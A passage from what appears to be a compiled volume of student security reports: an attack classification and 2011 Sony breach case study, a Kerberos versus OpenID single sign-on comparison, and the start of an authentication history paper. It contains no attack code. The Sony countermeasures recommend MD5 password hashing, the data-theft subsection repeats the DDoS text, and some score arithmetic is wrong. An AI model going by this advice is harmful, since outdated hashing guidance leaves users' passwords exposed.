Man-InThe-Middle
Occasional
attackers. Although the complexity of the attacks is
high, there is still a possibility for attacker to launch
IP Spoofing-based attack if they have managed to
exploit certain vulnerabilities and are equipped with
the necessary resources and technical expertise.
In our opinion, keylogging attack can take place
very frequently. This is because keylogging attack
can be very easily performed by any staff with just a
hardware in the organization. Once this hardware is
being plugged into the connector, it will start to
monitor the keystrokes of the user.
In our opinion, MITM attack can occur
occasionally. This is because MITM attacks can be
relatively easy to perform if the attacker has the
knowledge of the specific technique to perform the
MITM attacks. In addition to that, because of the
huge benefits that the attacker will receive from
MITM attack, such as obtaining and accessing
confidential information that flow between
computers, attackers wouldn‟t want to miss out on
such an opportunity.
4.3 Probability of Detection Classification
This classification identifies the probability of users detecting such attacks in their
system. The probability of detection can be described as High, Medium, Low. With
the probability of detection, we could also identify the potential to reduce or prevent
the computer attacks before it propagates , hence causing more damaging effects. The
reasons describe what constitutes a HIGH, MEDIUM, LOW for each of the attack
classification. The definition of the three probability levels are explained below.
Attacks
Distributed
Denial of
Service
(DDoS)
Range
Low
IP Spoofing
Low
Probability of Detection Classification
Reasons
Often, the communication between the master and agents
are very well hidden that it becomes complex to even
locate the master computer. Techniques are frequently
employed to intentionally hide the identity and location of
the master within the DDoS network. Thus, with the
existence of such techniques, it makes it that much harder
to even identify, detect or analyze an attack in progress.
More often than not, administrators do not even know that
their systems have been affected.
The probability of detecting a spoofed IP packet is low as
the source address been modified by the attacker. Thus it
makes it more difficult for those networks monitoring
147
Man-inthe-Middle
attack
Low
Keylogger
(hardware)
Low
software program to detect the source of the attack.
It requires technical techniques in order to detect man in
the middle attack such as complex cryptography
protocols, identifying the certificates authority if it is
trusted and others. If users do not have such level of
technical skills, they may not be able to detect that their
actions have been monitored by the attacker.
Often, hardware keylogger is not easily detectable due to
its small physical size. Also, it is unable to be detected by
any software program unless the user performs a physical
examination on the keyboard cable. Thus, if the user does
not do any probing, the keylogger will still continue
monitoring the user‟s keystrokes.
4.4 Severity Classification (Complexity of Attack and Scale of Damage)
This classification determines the severity resulting from the system attacks. The
ranking of severity are derived based on the weighted scores of the „Scale of Damage‟
and „Complexity of Attack‟ criteria. We would also like to find out if attackers require
any prior knowledge related to computer networks or systems to perform such attacks.
Scale of Damage includes the types of resources that were affected after the outcome
of the attacks and how does it affect the organization as a whole. Complexity of attack
refers to the technical skills, knowledge and expertise that were required by the
attackers to launch the attacks. The total weighted score will provide a better insight
on the attacks‟ level of complexity and how difficulty level the attacks can be carried
out, and how the scale of damage can be impactful it to the society or organization.
(Refer to Appendix F for more details on the reasoning)
Attacks
Distributed
Denial of
Service
IP Spoofing
Main-in-the
Middle
Keylogger
(hardware)
Total
Scale of
Damage
(60%)
1
Complexity
of Attack
(40%)
0.5
Weighted Score (%)
Overall
Ranking
1*0.6 + 0.5*0.4
= 80%
2
0.8
1
1
0.6
0.8
0.4
0.3
2.8
2.6
1*0.8 + 1*0.4
= 88%
1*0.6 + 0.8*0.4
= 68%
0.4*0.6 + 0.3*0.4 =
36%
272%
3
4
5. Case Study: Sony Corporation
In this section, we will be discussing about the various vulnerabilities which was in
fact, completely overlooked by Sony Corporation, and how those weaknesses had
paved way for attacks to be launched against Sony. Some of the attacks have been
148
discussed above. This section will also include providing our opinions on
countermeasures that Sony can possibly take to increase its security system.
5.1 Background of Sony Attacks
2011 has been a bad year for Sony Corporation and its users, as the organization has
been a victim of security breach. A group of hackers, known as Lulz Security, had
hacked into Sony’s system. Sony was forced to shut down their system to solve this
crisis, and even had to offer free credits for the online games to their users as a form
of compensation. In the following sections, we will be discussing more about the type
of attacks Sony faced, suggested countermeasures and how it is linked to some of the
system attacks that has been discussed in the first section.
5.2 Sony Case Study Classification
The goal of this classification is to identify the potential vulnerabilities associated
with the system attack, and the type of attacks which stemmed from the
vulnerabilities. The attacks‟ corresponding consequences are also identified. In the
case of Sony Corporation, research and analysis has to be carried out to determine
what are the areas of weakness in Sony Corporation system environment that might
be exploited. With the list of vulnerabilities we have identified, it would be possible
to derive the attacks and its associated consequences. The consequences describes the
impact to Sony‟s business/operation if the system attacks were to occur.
Suggested
Vulnerabilities/
Weaknesses in
Sony’s system
Sony has failed to
patch their
servers regularly.
Sony did not
perform adequate
testing on their
database.
Sony allowed the
reuse of the same
password for
different Sony‟s
services and other
websites.
Sony did not
encrypt the data
in the database
(eg. Passwords
Classifications for Sony’s Case Study
Attacks that
Consequences
Sony
encountered
Distributed
Denial of
Service (DDoS)
SQL Injection
Brute Force
Attack
Data Theft
This will cause disruption in services and
bring about great inconvenience to normal
users due to this high traffic of requests that
is being flooded at the server side.
Data such as user‟s personal information and
Sony‟s website data were being accessed and
manipulated, which resulted in website
defacement.
This resulted in the attacker to be able to get
the username and password from other
sources to easily launch a successfully brute
force attack.
As the data are unencrypted, attacker will
then be able to take advantage of such
vulnerabilities and steal the data.
Consequently, the attacker can log in to
149
were kept in
plaintext form)
and Sony did not
implement a
password strength
check
Sony‟s users accounts using those stolen
information.
Database server can also be easily hacked as
the passwords entered by the user may not
easy to decipher.
5.3 Types of Attacks according to Sony Case
5.3.1
Distributed Denial of Service (DDoS)
DDoS attacks were targeted on several services such as Sony PlayStation Network, its
Qriocity music streaming service, and Sony Online Entertainment. Large amounts of
traffic sent caused the web server to be unresponsive. The attack caused disruption,
making it difficult for their customers to use their services. This caused huge financial
losses and their goodwill were adversely affected. Anonymous, a hacktivist group
responsible for the attacks, had used botnets and a simple DDOS tool called the Low
Orbit Ion Cannon (LOIC) to perform such attacks. From the case study of Sony, we
can see how the DDOS attack (discussed in the first section) has been put into
practice and how it had affected the whole organization.
5.3.2
SQL Injection
The hackers had used a SQL injection attack to access and expose data on Sony. SQL
injection occurs when it exploits the vulnerabilities in input validation to run arbitrary
commands in the database. Thus, it allows an attacker to insert a database query where
it is able to fool the data server into running malicious code that will reveal sensitive
information or otherwise compromise the server. In the case of Sony, the hackers
accessed the passwords, email addresses, home addresses and dates of birth of nearly
one million users, and also stole all admin details of Sony Pictures, thus,
compromising the privacy of personal information of the site visitors. Often, the
attacker can take complete control over the underlying operating system of the SQL
server, or Web application, and ultimately, the Web server itself. From this attack that
Sony had faced, we can see that beside the four system attacks that we have
mentioned in the first section, there are many other new system attacks coming up that
a large corporation may be vulnerable to. Hence large corporation such as Sony
Corporation must be constantly prepared for any upcoming system attacks that can
cause them to have large damage and losses.
5.3.3
Brute Force Attack
Sony Corporation also encountered brute force attacks where it caused around 93,000
of Sony user accounts being compromised, forcing Sony to lock these 93,000
accounts and to reset the passwords.
According to the data released by Lulz Security, about 92% of the Sony users used
the same password on multiple Sony websites. Also, some of the common passwords
used by the users are "seinfeld", "123456" and "password". As seen from the
suggested vulnerabilities, it can be deduced that Sony Corporation does not
150
incorporate a strong defense mechanism against possible attacks. One such example is
the enforcement of poor password policy on their users. This then makes Sony a
susceptible and high target for the hackers to conduct a brute force attack to access
those accounts.
Since users may often have the habit to reuse the same password for their other
accounts, such as for their email, it becomes that much easier for the hacker to carry
out keylogging attacks. This becomes even more so with the low probability of being
detected by any software program or by the user. By obtaining the database server
password, the hacker is then able to obtain all the users‟ emails and passwords. Then
attacker is able to use the obtained list of information to carry out brute force attack
by using the different possible combinations to gain access to Sony services – Play
Station Network and Sony Online Entertainment.
5.3.4
Data Theft
DDoS attacks were targeted on several services such as Sony PlayStation Network, its
Qriocity music streaming service, and Sony Online Entertainment. Large amounts of
traffic were sent to the targeted web applications and caused the web server to be
unresponsive. The attack caused disruption, making it difficult for their customers to
use their services. This caused huge financial losses and their goodwill were adversely
affected. Anonymous, a hacktivist group responsible for the attacks, had used botnets
and a simple DDOS tool called the Low Orbit Ion Cannon (LOIC) to perform such
attacks. From the case study of Sony, we can see how the DDOS attack (discussed in
the first section) has been put into practice and how it had affected the whole
organization.
5.3.4.1 Countermeasures
5.3.4.1.1
Distributed Denial of Service
Establish a Back-Up “Mirror” Website. In our opinion, we believe that Sony
should establish a back-up “mirror” website that should be hosted on a different web
hosting provider. In the event of a DDoS attack, Sony can replace their affected
websites with the back-up “mirror” website. This ensures that Sony‟s customers can
still make use of their services, even if the website has been hit by a DDoS attack.
5.3.4.1.2
SQL Injection
White Hat Hacker. In our opinion, Sony should hire a white hat hacker who is a
computer expert that specializes in penetration testing to find out and fix the
vulnerabilities of the system. It would cost far less to perform thorough penetration
tests than to suffer the loss of trust, fines, disclosure costs and loss of reputation these
incidents have resulted in. Thus, with proper testing of the application, it will prevent
such SQL injections.
5.3.4.1.3
Brute Force Attack
151
Incremental Delay. By adding pauses/delay after each attempts of login failure can
help Sony to deal with brute force attack. This method is known as incremental delay
where the system tracks login failure based on "user session instead of authentication
credential basis." It works by adding an additional second to the response time after
each user fails to login to their account successfully. For example, if user failed to
login during the first attempt, it will delay for one second. If the user failed to login at
the second time, the response time will delay by two seconds and so on for the next
subsequent login attempts.
By adding a few seconds to the response time, it will help to slow down the brute
force attack and most importantly, users will not feel irritated especially if they
accidentally typed their password wrongly. As compared to the disabling of accounts
after multiple tries, this method is considered to be more practical as users do not
have to wait for a period of time before they can reactivate their account again.
5.3.4.1.4
Data Theft
Perform hashing of password. Since data theft attack occurs mainly due to the
unencrypted data, Sony Corporation should consider hashing its users‟ password with
the MD5 hashing algorithm before the password is being stored in the database. By
hashing the users‟ password, “it will turn the user password “my_password” to
something like “0x22cd3f2e3f2e56f7ecf5”. Since hashing is a one way function, it
makes it impossible for the attacker to recover the password from the hash even if the
attackers have managed to obtain the users‟ password from the database server. In
addition, if Sony Corporation is using a unix system, they should also consider
incorporating salt for each user in the database to make it more secure. “Salt is a twocharacter string that is stored in the password file along with the encrypted password.
With salt, a same password can be encrypted in 4096 ways”. If salt is not being used,
it makes it easier for the attacker to” construct a reverse dictionary where it is able to
convert the encrypted password back to its original form.” Finally, with the use of
hashing and salt, it will prevent the user‟s password from being easily obtained and
revealed in plaintext by the attacker.
6. Conclusion
In today‟s technology driven marketplace, many businesses have relied on the
internet to take advantage of web-based services due to competition. However, they
could not rule out the possibility of being targeted as attackers are becoming smarter
and stealthier in their methods. As threats are becoming more sophisticated and
prevalent, it is fundamental for businesses to prevent from computer network attacks
to protect their network security.
The attacks that Sony Corporation faced have raised an important lesson for
organizations and end users. In this advanced technological world, it is very easy to
become a victim of a cybercrime. So as an end user, we should learn to protect
ourselves by not becoming an easy target for the hackers and organizations should
also protect their customer information.
152
References
Kessler, G. C. (2000, November).Distributed denial-of-service. Retrieved
from http://www.garykessler.net/library/ddos.html
2. Farrapos, S., Gallon, L., & Owezarski, P. (2005, April).Network security and dos
attacks . Retrieved from http://spiderman2.laas.fr/METROSEC/Security_and_DoS.pdf
3. What is ip spoofing and how does it work?. (n.d.). Retrieved
from http://www.spamlaws.com/how-IP-spoofing-works.html
4. Velasco, V. (2000, November 21). Introduction to ip spoofing. Retrieved
from http://www.sans.org/reading_room/whitepapers/threats/introduction-ipspoofing_959
5. Ip spoofing. (n.d.). Retrieved
from http://www.andhrahackers.com/forum/hacking-tut/ip-spoofing/?wap2
6. Hassell, J. (2006, June 8). The top five ways to prevent ip spoofing. Retrieved
from http://www.computerworld.com/s/article/9001021/The_top_five_ways_to_
prevent_IP_spoofing
7. Wu, T., Chung, J., Yamat, J., & Richman, J. (n.d.). The ethics (or not) of massive
government surveillance. Retrieved from http://www-csfaculty.stanford.edu/~eroberts/cs201/projects/ethics-ofsurveillance/tech_keystrokelogging.html
8. Wikipedia. (n.d.). Keystroke logging. Retrieved
from http://en.wikipedia.org/wiki/Keystroke_logging
9. Lien, C., & Chen, C. (n.d.).Keylogger defender. Retrieved
from http://www.seas.ucla.edu/~chienchi/reports/CS236_keydef_pp1.pdf
10. Sony Corporation. (2011, October 12). Sony global - announcement regarding
unauthorized attempts to verify valid user account on playstation®network, sony
entertainment network and sony online entertainment. Retrieved
from http://www.sony.net/SonyInfo/News/Press/201110/11-1012E/index.html
11. Sulliva, B. (n.d.). Preventing a brute force or dictionary attack: How to keep the
brutes away from your loot . Retrieved
fromhttp://www.infosecwriters.com/text_resources/pdf/Brute_Force_BSullivan.p
df
12. Technical Info. (n.d.). The phishing guide (part 1) understanding and preventing
phishing attacks. Retrieved
fromhttp://www.technicalinfo.net/papers/Phishing.html
1.
153
Appendices
Appendix A: System Attack Frequency
Fig. 1. System Attack Frequency [1]
Appendix B: Distributed of Denial Services
154
Fig. 2. Intruder finding a site to compromise [2]
Fig. 3. Compromised system with DDoS daemon [2]
155
Fig. 4. Flooded Victim‟s Site [2]
Appendix C: Man-in-the-Middle
Fig. 5. Phishing Attack [10]
156
Appendix D: Spoofing
Fig. 6. The Actual Attack [23]
Appendix E: Keylogger
Fig. 7. How Keylogging works [32]
157
Fig. 8. Sample Log File Content [33]
Fig. 9. PS/2 Keylogger [36]
158
Fig. 10. USB Keylogger [37]
Appendix F System Classification Attack
Attacks
Distributed
Denial Of
Service
IP Spoofing
Man-in-the
Middle
System Attacks and its Estimated Scale of Damage
Scale of Reasons
Damage
(60%)
1
The scale of damage done by DDOS can be very large
where it can affect the availability of many big time online
sites. For example: The Internet portal Yahoo! has became
a victim of a DDoS attack, where it became inaccessible for
3 hours, and it suffered a loss of e-commerce and
advertising revenue that amounted to about $500,000.
0.8
The scale of damage done by IP Spoofing based attacks can
be quite large. This is because once the IP Spoofing based
attacks is successfully launched, attacker will be able to
gain unauthorized access to the entire corporate network
and steal/ compromise the entire corporation confidential
information.
0.6
The attacker has the ability to hijack credentials used in
two-factor authentication during online banking services.
Online banking customers are robbed off their online
identities and may incur financial losses if attacker
performs fraudulent transactions directly with the bank
using the customers‟ bank accounts.
159
Keylogger
(Hardware)
0.4
Total
2.8
Attacks
Distributed
Denial Of
Service
IP Spoofing
Man In The
Middle
Keylogger
(Hardware)
As compared to other attacks, the scale of damage for
keylogger attack may not be that large. This is so because it
only logged sensitive information on a particular computer.
Thus, not much of the information may be recorded. Also,
different levels of employees have different access control.
Hence, attacker may not be able to record the username and
password of the most confidential information.
System Attacks and its Associated Complexity
Complexity Reasons
of Attack
(40%)
DDOS attack is not very complex. It just needs
0.5
vulnerability in the system, and it can exploit the
system. For instance, a stolen account that they have
access to. The intruder can use this information to load
their DDoS programs onto the host.
IP Spoofing is not an actual attack, but rather it is a
1
hijacking technique that cyber-terrorist used to launch
various attacks. However, attacks employing IP
Spoofing can be very complex. To launch an attack
using IP Spoofing, the attacker must first have the
technical knowledge of how the different OSI layers,
TCP/IP suite and IP structure works. In addition, it
must also understand the flaw and security problem of
the TCP/IP suite. Other than that, there are a lot of
steps involved in any IP Spoofing based attacks where
attackers have to find a valid IP and TCP header in
order to form and inject the right IP packets and gain
unauthorised access to the computer, system and
network.
Since MITM attacks include different types of
0.8
techniques, the complexity ranges from easy to
difficult. An attacker requires knowledge of the
specific technique to perform MITM attacks (e.g. DNS,
ARP, HTTP, and SSL). Various software such
SSLStrip and Cain & Abel can also be used carry out
MITM attacks. For example, for a simple MITM
attack, a small webserver (to host a phishing website
and capture customers credentials) would suffice.
The complexity of keylogger attacks is not that
0.4
complex as hardware keylogger is the simplest
approach to carry out. Attackers are only required to
know which port to connect the connector to. Also it
does not require many resources. Attackers can install
160
the keylogger program into the machines easily without
any much effort by using the connector.
Total
Severity Level
High
Medium
Low
2.6%
Scale of Damage and Complexity of attack
Range
0.8 - 1
0.5 – 0.7
0.1 – 0.4
Appendix G: Other References
13. Ponemon Institute. (2011, August).Second annual cost of cyber crime study.
Retrieved
from http://www.arcsight.com/collateral/whitepapers/2011_Cost_of_Cyber_Crim
e_Study_August.pdf
14. Hines, E., & Gamble, J. (2002, February 25). Non blind ip spoofing and session
hijacking: A diary from the garden of good and evil. Retrieved
from http://flur.net/archive/research/non-blind-hijacking.pdf
15. Tcp/ip suite weaknesses. (2006, November 11). Retrieved
from http://mudji.net/press/?p=152
16. Bao Ho& Toan Tai Vu (2003). Ip spoofing (A study on attacks and countermeasures). Retrieved fromhttp://www.docstoc.com/docs/45752165/IP-spoofing
17. Olza, T. (2008, April). Keystroke logging (keylogging) . Retrieved
from http://adventuresinsecurity.com/images/Keystroke_Logging.pdf
18. SpyCop. (n.d.). Hardware keylogger detection. Retrieved
from http://spycop.com/keyloggerremoval.htm
19. KeyCarbon. (n.d.). Keystroke recorders for usb keyboards ("keycarbon usb").
Retrieved from http://www.keycarbon.com/products/keycarbon_usb/overview/
20. Schneier, B. (2008, November 10).Schneier on security: aspidistra. Retrieved
from http://www.schneier.com/blog/archives/2008/11/aspidistra.html
21. Wikipedia. (n.d.). Aspidistra (transmitter). Retrieved
from http://en.wikipedia.org/wiki/Aspidistra_(transmitter)
161
162
Report for the Study of Single-Sign-On (SSO), an
introduction and comparison between Kerberos based
SSO and OpenID SSO
Xiao Zupao
Abstract. Single-Sign-On is a useful technique that allows users to authenticate
their identities only once to system and after that it will log in the user
automatically. It will reduce a lot of logging time and also reduce the risk of
suffering from security problems like phishing. This report will give a brief
introduction of the traditional Kerberos based SSO and also a new kind of SSO
called OpenID SSO. The report will also do a comparison between these two
techniques in varies ways.
Keywords: Single-Sign-On, Kerberos, OpenID.
1
Introduction
Single-sign-on is a technique that related the access to multiple independent
systems. It allows users to log in only once and then access all the independent
systems without log in manually.
1.1
Benefits
Single-sign-on benefit users in the following several points:
 It reduce the time spending in typing in username and password
 It reduce password fatigue as using SSO, user only need to remember one
username and password for all the systems involved.
 It reduce the phishing success since there is no need for users themselves
to type in the password where ask for a service.
1.2
Varies implementations
Currently there are a lot of ways to implement SSO; I will briefly introduce four of
them in this part:
163
 Kerberos based SSO
Kerberos-based SSO maintains a centralized authentication server that
stored all users’ information. User firstly authenticated themselves to this
server and the server will give back the user a ticket. User can use the
ticket to request services from other independent servers that related with
the centralized authentication server. The detail process will be described
later in this report.
 Smart-Card based SSO
Users firstly insert the smart card and type in the password to authenticate
them. Later when they want to ask for a server, they just insert the card and
the authentication will be done by the SSO server. Smart-Card based SSO
need a Kerberos Domain Controller (KDC). As I see, the process for smartcard based SSO is just the same as Kerberos based SSO, except that it needs
a card which makes the authentication more secure at first stage. But, what if
the user authenticates at first then he/she lost the card?
 Integrated windows authentication
Integrated Windows Authentication is a term associated with Microsoft’s
product. This is used more commonly for the automatically authenticated
connection between Microsoft internet information services and Internet
Explorer.
Integrated window authentication at first do not prompt for user name and
password, instead the browser will exchange the current users’ information
with the web server through a cryptographic exchange. If this failed, it will
prompt for user name and password. For windows-NT based SSO, the
Kerberos protocol is also involved, and it also implement other protocols to
make sure that if Kerberos fails, the system still works correctly.
 OpenID SSO
The OpenID SSO is totally different from the above implementations. It
does not need a centralized server to work for identifying the user and
establishing the authentication between the user and the service server. Users
create an account with their preferred OpenID identify providers, and then
with this account, the user can sign on to any website that accepts OpenID
authentication. I will introduction the detail process in this report.
164
2
2.1
Kerberos based SSO
Terminology1
 Key Distribution Center (KDC)
KDC is a trusted third-party for client and the service server from
where the client asks for service. It consisted of two parts, namely
Authentication Server and Ticket Granting Server.
 Authentication Server (AS)
AS is the server authenticate the user’s identity. It will make sure
that you are you, not anyone else.
 Kerberos tickets
Kerberos ticket is distributed by AS and encrypted with server key.
It contains a session key, and contains the corresponding user’s name
and a time stamp to indicate when this ticket is valid.
 Ticket Granting Server (TGS)
TGS issue additional tickets
 Ticket Granting Ticket (TGT)
TGT is returned from AS when the first time client authenticates to
the AS. Client uses this TGT to get additional tickets from TGS for SS.
This TGT has a short life, typically 8 hours. TGT contains Client ID,
client network address, ticket valid period, and the client/TGS session
key).
 Server key
Server key refer to the key shared by AS and service provided
server.
 Session key
Session is a newly generated key with a time stamp. “Newly”
means it is generated every time user wants to request a new service.
 User
“User” refers the person who uses the client machine to ask for
service.
 Client
1
Reference: http://en.wikipedia.org/wiki/Kerberos_(protocol)
165
“Client” refers to the machine that user uses.
2.2
How it works?2
1. First stage: user authenticates to AS
 User enters a username and password on client machine.
 Client hashes the password, and this becomes the private key for
user/client.
 Client sends a plain text contains user name to AS to request services.
 AS check whether the user name is in its database. If yes, it will return
two messages:
1.
2.
Client/TGS session key encrypted using the secret key of
client/user. (This secret key is pre store in AS, not provided by
the client.)
TGT which is encrypted using TGS’s private key.
 Upon client receive the two messages; it will try to decrypt the first
message using the private key generated previously. If it can be decrypted
successfully, it means the user is the right person. After decrypt first
message, client got the session key to communication with TGS.
─ User authentication process end here, by now, user can ask for any services
without type in user name and password. All the verification process with be
done by client, KDC and SS automatically.
2. Second stage: user ask for service from SS
=======================================================3
 When user ask for a service, the client will send two messages to TGS:
1.
2.
Compose the encrypted TGT and the ID of the requesting
service.
Encrypt clients’ ID and time stamp with client/TGS session key
got from first stage.
 When TGS receive the two messages, it will get the encrypted TGT and
decrypt it with TGS private key. Then TGS get the TGS/Client session
key from TGT. And with this session key, TGS decrypted the second
2
3
Reference:
http://en.wikipedia.org/wiki/Single_sign-on;
Authentication Service for Computer Network.”
“Kerberos:
Processes within “===” are doing by the client, KDC and SS, user will not involve.
166
An
message from client and get client ID with a time stamp. Then it will send
client two messages:
1.
2.
Client-to-Server ticket, this contains the client’s information
and client/server session key. It is encrypted with service
server’s private key.
Client/server session key encrypted with client/TGS session
key.
 Client get the two messages and decrypt the second message with
client/TGS session key and get client/server session key. Upon doing this,
client has enough information to authenticate itself to SS. It send two
messages to SS:
1.
2.
Encrypted client-to-server ticket (the first message got from
TGS)
Client ID, timestamp encrypted with the client/server session
key.
 When SS receive the two messages from client, it decrypts the first
message using its private key to get the client/server session key. And
with this session key, SS can decrypt the second message which contains
the client information and a timestamp. Then SS will return to client a
message contains the timestamp+1, and this message is encrypted with the
client/server session key. This message is a confirmation message.
 When client receive the confirmation message, it decrypts the message
with client/server session key and to check if the timestamp has updated.
If yes, then the client can trust the SS. And then, the client can start
requesting services.
===================================================
 The server provided the requested service to client.
─ To now everything is done and the user can enjoy the services without entering
username and password again and again.
167
2.3
A diagram show the whole process4
4
Adopted from http://en.wikipedia.org/wiki/File:Kerberos.png
The printer is an example of SS.
168
3
OpenID SSO5
3.1
Terminology
 End-user
End-user is the entity who wants to assert a particular identity,
namely the OpenID holder.
 Identifier or OpenID
OpenID is a URL or XRI that the end-user holder to prove enduser’s identity.
 Identifier provider or OpenID provider
OpenID provider, “OP”, is the service that provides OpenID
registering and authentication, i.e. end-user get OpenID from OP.
 Relying party
Relying party is the service provider, the site that want to verify
end-user’s identity.
 User-agent
User-agent is a program used by end-user to communicate with
Relying party and OpenID provider, typically a web browser
implements Http/1.1.
 OP Endpoint URL
OP Endpoint URL is the URL that accept OpenID authentication. It
is obtained from user’s input OpenID identifier.
3.2
How it works?6
 When end-user wants to log into a site, he/she will be presented will a
login form.7
 User responds with the OpenID, i.e., the URL.
 Relying party receive the URL, and from the URL, it gets the OP endpoint
URL. 8
5
Reference from “OpenID Authentication 2.0 –Draft 11”. http://openid.net/specs/openid-
authentication-2_0-11.html
6
Reference: http://www.windley.com/archives/2006/04/how_does_openid.shtml
7
Mostly this log in form is some button like Google, yahoo, Facebook, etc.
8
The obtaining process is call “normalizing”.
169
 After getting the OP endpoint URL, the relying party communicates with
OP to establish a share secret using Diffie-Hellman Key Exchange.9
 The relying party redirects the end-user’s browser to the OP with an
OpenID authentication request.
 The OP prompts for a window request end-users name and password to
authenticate the end-user.10
 End-user sends username and password to OP server.11
 If the username and password is correct, end-user authenticated itself to
the OP server. Then the OP server will return a form to ask end-user
whether trust the relying party or not.
 End-user responds to the server.
 Based on end-user’s respondent, OP server will redirect user-agent with
different URL provided by relying party.
 The relying party returns corresponding pages to end-user according to the
URL in above step.
─ The relying party authentication ends here. If the user’s username and password
of OP is correct and choose to trust the relying party, the user will successful log
in to the relying party’s site.
4
Comparison between Kerberos based SSO and OpenID SSO
In this part, I will compare the two implementation of SSO in several ways.
9
This step is optional, if the relying party and OP had established connection before, it can be
skipped.
10
If end-user had logged into the server before, then this step will be skip.
11
As above, this step will also be skipped.
170
4.1
Environment
 Kerberos.
Because of the need of a centralized KDC, Kerberos based SSO is hard to
implement in a large scale. The implementation environment is typically a
local intranet like university, company or hospital, etc.
 OpenID
OpenID is implemented in the internet, connecting lots of websites.
Currently OpenID supported sites include Google, Facebook, Yahoo, AOL,
etc.
─ The implementation environment is quite different for these two SSO
technologies. And because of this, the security concern for these two
implementations will also be different.
o For Kerberos, its largest drawback is that all the information is store
in KDC, and if KDC fails, everything would not work, this is not
good for information availability. However, for other type of attack
like man-in-middle attack, Kerberos can defend them quite well.
o For OpenID, the most concerned security issue should be the manin-middle attack. In earlier version of OpenID, it is very weak to
protect the attack. In the newest version, developers introduce some
techniques like nonce to defend the attack. However it is still cannot
solve the problem. A sophisticated hacker can get end-user’s
identifier and make use of it easily.
4.2
Encryption
 Kerberos
Kerberos protocol use data encryption standard (DES) encryption during
the communication between client, SS and KDC. And it also uses checksum
to ensure the integrity.
 OpenID
OpenID support three signature algorithms:
171
1.
2.
3.
No encryption.
HMAC-SHA1 -160 bit key length12
HMAC-SHA256 -256 bit key length13
─ From the encryption methods, we can see that both implementations have a
good enough algorithm to encrypt the messages to ensure confidentiality.
However, for OpenID, we can also see that because it is a new technology, it
has not set up a standard. Relying parties may use difference signature algorithm
and some even not use, which will increase the risk from being attacked.
4.3
Easy to use?
 Kerberos based SSO
The set-up of Kerberos based SSO is really making life easier for users. It
achieves the goal that entering username and password only once and then
the system will automatically log the user in to other independent systems.
 OpenID
As far as I see, OpenID is not so convenient to use. Although a lot of the
websites join the OpenID standard, most of them still use their own
username and password. Even when user wants to log in using OpenID
identifier, they need to copy the URL first (at least remembering the URL).
For some sites, they will provide some OpenID provider options for user to
log in, typically Google, Facebook, Yahoo, etc. This makes things easier to
some degree since for a normal user, their account, say, Google account will
always in logged in state.
However, OpenID is still a great idea. And I think it would be the right
way to log to website in the future.
4.4
Any similarities?
I always wonder are there any common points between Kerberos and OpenID.
So I write out the main working flow of them in a simplified way.
 Kerberos
12
13
RFC2104 and RFC 3174
RFC2104 and FIPS180-2
172
o
o
o
o
o
o
User enter username and password
KDC authenticate the user
User request a new service from SS
Client (user’s machine) go for KDC for ticket
Client gets ticket and sends it to the SS.
User get the service
 OpenID
o
o
o
o
o
o
User present a URL to log in to a relying party
Relying party go for the OP to authenticate the user.
OP prompts a window for username and password.14
User enters the username and password.
OP authenticate the user and redirect to relying party
User log into the relying party.
─ From above, we can see that Kerberos and OpenID have some similarities. In
OpenID, the OP plays the role of KDC and the relying party takes the job of
user’s machine to communicate with OP.
Kerberos implementations’ biggest drawback is it needs a central server to store
all the information and process all the requests. If it is down, everything will
fail.
Also, OpenID faces the difficulty to protect from man-in-middle attack.
So is there any ways to combine these two implementations to provide a better
solution?
 My Kerberos OpenID
o
o
o
o
o
o
14
User wants to log in to a relying party through an OP.
User agent (user’s browser or machine) check whether user logged
into the OP. if not, prompt for user to log in.
If yes, user agent sends the username and relying party URL to OP.
OP sends back two messages:
 First message is client’s information and a session key;
they are encrypted with relying party’s private key.
 Second message is the session key encrypted using user’s
password.
Client gets the session key using user’s password and sends the first
message and a timestamp encrypted with the session key.
Relying party gets the two messages, it firstly decrypts the first
message to get the session key and client information. It checks
client information to ensure that it is not anyone else. And then
relying party decrypts the timestamp using the session key, updates
If user logged previous, this step would be skipped.
173
o
the value and encrypts it with the session again and sends back. At
the same time, relying party can log user in.
Upon client receive the timestamp, and check it is correct. Then in
this stage client also trust the relying party.
─ Except for the first message which contains the user name, other messages are
all encrypted with keys. The session key only valid in a short period. And this is
very similar to how Kerberos SSO works.
─ Assumes:
o Every relying party maintains a table containing the private keys
shared by with each of the OPs.
o Relying parties trust the OPs.
o User trusts the OPs.
5
Conclusion
The report has introduced the Kerberos based Single-Sign-On and also a new
technology called OpenID. I make a comparison between through
implementation environment, encryption methods and also to research that
whether it makes users’ life easier. And at the end I make a combination with
the two, this conclude the report.
6
1.
2.
3.
4.
5.
Reference
http://en.wikipedia.org/wiki/Kerberos_(protocol)
B.Clifford Neuman, Theodore TS’o: Kerberos: An Authentication Service for
Computer Networks.
OpenID Authentication 2.0 –Draft 11. http://openid.net/specs/openidauthentication-2_0-11.html#RFC2631
http://en.wikipedia.org/wiki/OpenID.
http://www.windley.com/archives/2006/04/how_does_openid.shtml.
174
A Historical Perspective: An Exploration into the Various
Authentication Methods Used to Authenticate Users and
Systems
Gee Seng Richard Heng, Horng Chyi Chan, Huei Rong Foong, Wei Jie Alex Chui
National University of Singapore, School of Computing
Singapore
Abstract. In this paper, we explore the different and major techniques used
for authenticating various operating systems and users in a historical
perspective. This paper provides an insight using a timeline which gives a
clear illustration on how authentication methods have evolved over time. It
provides an introduction on the history of each of the authentication technique
as well. This paper will also specify on the steps on authenticating users and
systems for each authentication method as well as the limitations for some
authentication methods.
Keywords: Authentication, CA, CP, Encryption, Handshake, Historical,
Host-based, IETF, KDC, Kerberos, LDAP, Microsoft Login, MIT, MSCHAP, NTLM, OS, Open Source, Passwords, PKC, PKI, Private Key,
Protocols, Public Key, Rhost, SSH-1, SSH-2, SSL, Third-Party, TLS,
Transport Layer, UNIX, Windows, X.500
1
Introduction
Over the years, there are many different techniques used for authentication.
Authentication protocols allow any user to access network resources or logon to a
domain after the identity of the user is confirmed. With many different techniques
available, using the appropriate method of authentication in different areas becomes
the most crucial decision to make in authenticating users and securing of systems. We
will look into the various authentication methods below in a chronological order.
2
Timeline of Authentication Methods Used on Different
Operating Systems
During 1980s and 1990s, many new authentication methods emerged and more
improvements were done along the way. The earliest authentication method for users
and systems in 1961 which featured log-in commands are the use of passwords. Later
on, the usage of passwords has improved from a mere plaintext password to the use of
challenge-response passwords. Since there was a need for a trusted authority to certify
175
the trustworthiness of public keys, it urged the usage of Public Key Infrastructure
(PKI) in 1969 and subsequently the concepts were publicly released in 1976.
The release of Microsoft‟s oldest and first ever authentication protocol, known as the
